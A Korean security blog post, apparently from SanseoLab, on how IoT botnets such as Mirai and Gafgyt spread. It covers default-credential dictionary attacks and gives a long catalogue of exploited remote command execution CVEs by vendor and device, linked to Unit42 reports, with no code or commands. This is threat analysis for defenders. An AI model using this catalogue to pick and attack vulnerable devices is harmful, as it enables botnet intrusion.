SanseoLab

1. 도구

- Ollydbg 2.01 매뉴얼 [ http://sanseolab.tistory.com/8 ]

- Windbg, Gdb 명령어 정리 [ http://sanseolab.tistory.com/22 ]

- VC++ 옵션 정리 [ http://sanseolab.tistory.com/20 ]

- exeinfo PE 사용법 [ http://sanseolab.tistory.com/48 ]

- x64dbg 분석 팁 [ http://sanseolab.tistory.com/54 ]

- IDA Pro 시그니처 사용 및 제작 (Flirt) [ http://sanseolab.tistory.com/55 ]

- GCC 사용법  [ http://sanseolab.tistory.com/67 ]

- 디버거로 덤프뜨기  [ http://sanseolab.tistory.com/73 ]

- Notepad++ 자동화  [ http://sanseolab.tistory.com/74 ]

- TotalCommand 자동화  [ http://sanseolab.tistory.com/75 ]

2. 보안 개념

- 코드 인젝션과 사용자 모드 후킹 [ http://sanseolab.tistory.com/28 ]

- 윈도우의 예외 처리 [ http://sanseolab.tistory.com/16 ]

- 윈도우의 서비스 [ http://sanseolab.tistory.com/18 ]

- API Sets [ http://sanseolab.tistory.com/17 ]

- 윈도우의 자료형 정리 [ http://sanseolab.tistory.com/9 ]

- 윈도우에서 스크립트 악성코드 [ http://sanseolab.tistory.com/41 ]

- 악성코드 분석 자동화 (샌드박스 및 에뮬레이터) [ http://sanseolab.tistory.com/39 ]

- 안티바이러스의 악성코드 탐지 메커니즘 [ http://sanseolab.tistory.com/35 ]

- 다형성 바이러스 [ http://sanseolab.tistory.com/19 ]

- 악성코드 지속 메커니즘 [ http://sanseolab.tistory.com/30 ]

- 파워셸(PowerShell)과 악성코드 [ http://sanseolab.tistory.com/29 ]

- 윈도우 권한과 UAC (User Access Control) 우회 [ http://sanseolab.tistory.com/27 ]

- 악성코드가 감염되기까지 [ http://sanseolab.tistory.com/26 ]

- EFLAGS 상태 레지스터 [ http://sanseolab.tistory.com/44 ]

- Anti-AV와 Anti-VM (Sandbox) [ http://sanseolab.tistory.com/52 ]

- Access Token 및 권한과 Integrity Level에 대한 정리 [ http://sanseolab.tistory.com/50 ]

- COM, OLE,.NET Framework 등의 개념 및 사용 [ http://sanseolab.tistory.com/49 ]

- TEB 및 PEB를 활용하는 루틴 [ http://sanseolab.tistory.com/47 ]

- Process Hollowing 및 응용  [ http://sanseolab.tistory.com/57 ]

- CreateProcess / CreateThread 내부  [ http://sanseolab.tistory.com/58 ]

- 악성 행위에 사용될 수 있는 시스템 유틸리티  [ http://sanseolab.tistory.com/66 ]

- 윈도우의 작업 스케줄링 및 기타  [ http://sanseolab.tistory.com/68 ]

- batch (cmd) 난독화  [ https://sanseolab.tistory.com/76 ]

- 파워셸에서 사용되는 닷넷 문법  [ https://sanseolab.tistory.com/77 ]

- 리눅스 IoT 악성코드들의 전파 방식  [ https://sanseolab.tistory.com/78 ]

3. 분석

- 패커들 분석 [ http://sanseolab.tistory.com/10 ]

- Yoda's Protector 분석 [ http://sanseolab.tistory.com/11 ]

- 프로텍터 PEspin 1.33 분석 [ http://sanseolab.tistory.com/34 ]

- 델파이 바이너리 분석 방법론 [ http://sanseolab.tistory.com/56 ]

- Autoit 스크립트  [ http://sanseolab.tistory.com/59 ]

- 바이너리로 변환된 VBScript 디컴파일  [ http://sanseolab.tistory.com/60 ]

- 오토핫키 (AutoHotKey) 버전 별 디컴파일  [ http://sanseolab.tistory.com/61 ]

- 바이너리로 변환된 스크립트 추출 ( VBScript, Powershell, Batch )  [ http://sanseolab.tistory.com/63 ]

- Visual Basic 6.0 바이너리 분석  [ http://sanseolab.tistory.com/64 ]

- 인스톨러들 분석  [ http://sanseolab.tistory.com/65 ]

- USB 악성코드 분석 [ http://sanseolab.tistory.com/42 ]

4. 개발

- 간단한 패커 개발 [ http://sanseolab.tistory.com/12 ]

- 윈도우의 드라이버 개발과 루트킷 그리고 AV [ http://sanseolab.tistory.com/13 ]

- 리눅스 안티바이러스 구현에 관한 정리 [ http://sanseolab.tistory.com/23 ]

- 윈도우 안티바이러스 드라이버 개발 연습 [ http://sanseolab.tistory.com/33 ]

- 윈도우 드라이버로 구현한 간단한 프로세스 로그 생성기 (Process Logger) [ http://sanseolab.tistory.com/38 ]

- yara를 이용한 시그니처 분류 연습  [ http://sanseolab.tistory.com/62 ]

- [Tool] ejExtractor  [ http://sanseolab.tistory.com/72 ]

1. 개요

Mirai, Gafgyt 등의 악성코드들은 소스 코드가 공개된 이후 현재까지 다수의 변종들이 만들어지고 있다. 이러한 IoT 악성코드들은 대부분 기능상 DDoS Bot이며, 그렇기 때문에 효과적인 DDoS 공격을 위해서는 다수의 Botnet이 필요하다. 즉 해당 IoT DDoS Bot 악성코드들은 DDoS 공격과 관련된 기능 외에도 또 다른 취약한 디바이스들을 스캐닝하고 더 나아가 확인된 취약한 장비들에 동일한 악성코드를 전파시키는 기능이 포함될 수 밖에 없다. 

여기서는 크게 초기 버전부터 사용되고 있는 사전 공격 (Dictionary Attack) 방식과, 이후 변종들의 다수를 차지하고 있는 취약점 기법들에 대해서 다룬다.

2. ID / PW 사전 공격

다음은 Gafgyt의 초기 버전인 Bashlite의 소스 코드이다. usernames와 passwords를 살펴보면 root를 포함한 admin, user 등의 기본적으로 사용될만한 ID를 가지고 있으며, 비밀번호 또한 root, toor, admin 등 관리자가 보안에 신경쓰지 않고 간략하게 설정할 만한 비밀번호 값들을 갖는다.
[ https://github.com/ifding/iot-malware/blob/master/BASHLITE/client.c ]

StartTheLelz() 함수는 getrandompublicip() 함수를 통해 랜덤으로 구한 IP 주소에 (사설 IP 대역 등은 제외한다) 위의 ID / PW 값들을 통해 로그인을 시도한다. 참고로 후술할 Mirai와 달리 매우 간단한 편이기 때문에 따로 전파 기능을 갖지 않고 C2 서버에 성공한 서버의 IP와 ID / PW를 전송한다.

다음은 Mirai 악성코드의 공개된 초기 버전 소스 코드이다. 디폴트 ID와 비밀번호가 포함된 소스 코드이다.
[ https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c ]

Bashlite와 같이 보안에 취약한 ID / PW 값들을 포함할 뿐만 아니라 IoT 장비의 디폴트 ID 및 비밀번호들도 포함하고 있다. 참고로 Mirai는 이렇게 보안에 취약한 장비들을 스캐닝할 뿐만 아니라 로그인에 성공한 서버에 (참고로 busybox도 설치되어 있어야 한다) Mirai 악성코드를 전파하는 기능도 포함하고 있다.

위에서는 초기 소스 코드를 기반으로 확인하였지만, 이후 나오는 변종들에서는 더 많은 ID / PW 조합이 (Credential combination) 사용되고 있다. 다음은 관련 내용이 언급된 분석 글들의 링크이다.
[ https://blog.avast.com/hacker-creates-seven-new-variants-of-the-mirai-botnet ]
[ https://www.imperva.com/blog/malware-analysis-mirai-ddos-botnet/ ]
[ https://medium.com/@ahmedjouini99/mirai-botnet-new-sophisticated-scanner-6ad9269c14 ]
[ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

3. 취약점

ID / PW 사전 공격 외에도 만약 대상 디바이스에 취약점이 존재하여 악성코드를 다운로드 받고 실행할 수 있다면 이 취약점을 통해 전파가 가능하다.

취약점 관련 내용은 Palo Alto Networks가 꾸준히 잘 정리된 블로그를 올렸기 때문에 링크만 걸어도 충분할 것 같다. 물론 여러 개의 블로그에 나뉘어져 있어서 간략히 정리하는 의미로, 그리고 이후 추가된 블로그 및 상세 내역을 추가해 가는 방식을 위해 이 블로그에서도 간략하게 정리하도록 한다.

2018.07.20 - [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]
2018.09.09 - [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]
2019.03.18 - [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]
2019.04.08 - [ https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ ]
2019.06.06 - [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

아래에 정리된 내용을 보면 알겠지만 대부분 Remote Command Execution 취약점들이다. 즉 원격으로 패킷을 보내는 방식을 통해 악의적인 명령이 수행될 수 있다. 대부분 wget을 이용해 악성코드를 다운로드 받고 실행하는 방식이 사용된다.

LynkSys 취약점

취약점 : LynkSys Remote Command Execution
대상 : Linksys E-series Devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : Linksys WAP54Gv3 Remote Debug Root Shell
대상 : Linksys WAP54G Wireless Access Points
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : CVE-2013-3568
대상 : Linksys WRT100, WRT110 consumer routers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : Linksys apply.cgi Remote Command Execution
대상 : Linksys E1500/E2500 routers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

NetGear 취약점

취약점 : Netgear setup.cgi unauthenticated Remote Command Execution
대상 : DGN1000 Netgear routers
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : Netgear cgi-bin Remote Command Execution
대상 : Netgear R7000/R6400 devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : CVE-2016-1555
대상 : Netgear WG102, WG103, WN604, WNDAP350, WNDAP360, WNAP320, WNAP210, WNDAP660, WNDAP620 devices
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : CVE-2017-6077, CVE-2017-6334
대상 : Netgear DGN2200 N300 Wireless ADSL2+ Modem Routers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : Netgear Prosafe Remote Command Execution
대상 : Netgear Prosafe WC9500, WC7600, WC7520 Wireless Controllers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : Netgear ReadyNAS Remote Command Execution / CVE-2018-15716
대상 : Netgear ReadyNAS Surveillance 1.4.3-16 and NUUO NVRMini devices
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

D-Link 취약점

취약점 : HNAP SoapAction-Header Remote Command Execution
대상 : D-Link devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : UPnP SOAP TelnetD Remote Command Execution
대상 : D-Link devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : D-Link command.php Remote Command Execution
대상 : Some D-Link Devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : D-Link DCS-930L Remote Command Execution
대상 : D-Link DCS-930L Network Video Cameras
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : D-Link diagnostic.php Command Execution
대상 : D-Link DIR-645, DIR-815 Routers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : D-Link DSL2750B Remote Code Execution
대상 : D-Link DSL2750B
예시 : [ https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ ]

기타 취약점

취약점 : CVE-2018-10561, CVE-2018-10562 Remote Command Execution
대상 : Dasan GPON routers
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : CVE-2014-8361
대상 : Different devices using the Realtek SDK with the miniigd daemon
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : CVE-2017-17215
대상 : Huawei HG532
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : Eir WAN Side Remote Command Execution
대상 : Eir D1000 routers
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : CCTV/DVR Remote Command Execution
대상 : CCTVs, DVRs from over 70 vendors
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : JAWS Webserver unauthenticated shell command execution
대상 : MVPower DVRs, among others
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : Vacron NVR Remote Command Execution
대상 : Vacron NVR devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ ]

취약점 : EnGenius Remote Command Execution
대상 : EnGenius EnShare IoT Gigabit Cloud Service 1.4.11
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : AVTECH Unauthenticated Remote Command Execution
대상 : AVTECH IP Camera/NVR/DVR Devices
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : CVE-2017-6884
대상 : Zyxel routers
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : NetGain ‘ping’ Command Injection
대상 : NetGain Enterprise Manager 7.2.562
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : NUUO OS Remote Command Execution
대상 : NUUO NVRmini 2 3.0.8
예시 : [ https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ ]

취약점 : CVE-2018-17173
대상 : LG Supersign TVs
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : WePresent WiPG-1000 Remote Command Execution
대상 : WePresent WiPG-1000 Wireless Presentation systems
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : Zyxel P660HN Remote Command Execution
대상 : Zyxel P660HN-T routers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : ZTE Remote Command Execution
대상 : ZTE ZXV10 H108L Routers with <= V1.0.01_WIND_A01
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : Apache Struts 2 Remote Command Execution / CVE-2017-5638
대상 : Apache Struts 2.3.5~2.3.31 버전, Apache Struts 2.5~2.5.10 버전, Cisco 제품 : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : SonicWall GMS Remote Command Execution / CVE-2018-9866
대상 : SonicWall Global Management System (GMS) (8.1 and older)
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ ]

취약점 : ThinkPHP Remote Command Execution / CVE-2018-20062
대상 : ThinkPHP 5.x < v5.0.23
예시 : [ https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ ]

취약점 : CVE-2019-3929
대상 : Wireless Presentation Systems from several vendors
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : OpenDreamBox Remote Code Execution
대상 : Devices running OpenDreamBox 2.0.0 ? an embedded Linux distribution for Set-Top-Boxes
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : CVE-2018-6961
대상 : VMware NSX SD-WAN Edge < 3.1.2
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : CVE-2018-7841
대상 : Schneider Electric U.motion LifeSpace Management Systems
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : Dell KACE Remote Code Execution
대상 : Dell KACE Systems Management Appliances
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : CVE-2017-5174
대상 : Geutebruck IP Cameras
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : HooToo TripMate Remote Code Execution
대상 : HooToo TripMate Routers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : CVE-2018-11510
대상 : Asustor NAS Devices
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : CVE-2019-2725
대상 : Oracle WebLogic Servers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : ASUS DSL Modem Remote Code Execution
대상 : ASUS DSL-N12E_C1 1.1.2.3_345
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : Belkin WeMo Remote Code Execution
대상 : Belkin WeMo Devices
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : MiCasa VeraLite Remote Code Execution
대상 : MiCasa VeraLite Smart Home Controllers
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]

취약점 : GoAhead Remote Code Execution
대상 : IP cameras manufactured by GoAhead, Aldi, and several others
예시 : [ https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ ]